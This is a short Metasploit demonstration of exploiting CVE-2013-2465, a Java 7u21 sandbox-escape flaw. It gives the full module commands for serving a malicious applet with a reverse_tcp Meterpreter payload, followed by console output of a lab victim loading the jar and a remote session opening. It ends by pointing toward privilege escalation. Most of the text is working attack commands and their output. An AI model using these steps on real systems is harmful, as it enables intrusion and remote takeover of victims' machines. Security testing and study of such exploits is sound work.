Metasploit Demo: CVE-2013-2465 Java storeImageArray() Invalid Array Indexing vulnerability

Description:
This module abuses an Invalid Array Indexing Vulnerability on the static function storeImageArray() function in order to produce a memory corruption and finally escape the Java Sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn’t bypass click2play, has been tested successfully on Java 7u21 on Windows and Linux systems.

References:
http://cvedetails.com/cve/2013-2465/
http://www.osvdb.org/96269
http://www.exploit-db.com/exploits/27526
http://packetstormsecurity.com/files/122777/
http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040

Commands:
use exploit/multi/browser/java_storeImageArray_Invalid_Array_Indexing
set SRVHOST 192.168.23.70
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.23.70
exploit

[*] Started reverse handler on 192.168.23.70:4444
[*] Using URL: http://192.168.23.70:8080/
[*] Server started.
[!] 192.168.23.72 java_storeImageArray_Invalid_Array_Indexing – Requesting: /
[*] 192.168.23.72 java_storeImageArray_Invalid_Array_Indexing – Sending HTML…
[!] 192.168.23.72 java_storeImageArray_Invalid_Array_Indexing – Requesting: /favicon.ico
[*] 192.168.23.72 java_storeImageArray_Invalid_Array_Indexing – Sending redirect…
[!] 192.168.23.72 java_storeImageArray_Invalid_Array_Indexing – Requesting: /OanvBtW.jar
[*] 192.168.23.72 java_storeImageArray_Invalid_Array_Indexing – Sending .jar file…
[!] 192.168.23.72 java_storeImageArray_Invalid_Array_Indexing – Requesting: /OanvBtW.jar
[*] 192.168.23.72 java_storeImageArray_Invalid_Array_Indexing – Sending .jar
file…
[*] Sending stage (30355 bytes) to 192.168.23.72
[*] Meterpreter session 1 opened (192.168.23.70:4444 -> 192.168.23.72:1293) at 2013-08-23 03:06:01 -0200
msf exploit(java_storeImageArray_Invalid_Array_Indexing) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid

//From here you can upload and execute a Meterpreter binary to escalate privileges (see this post for a step by step).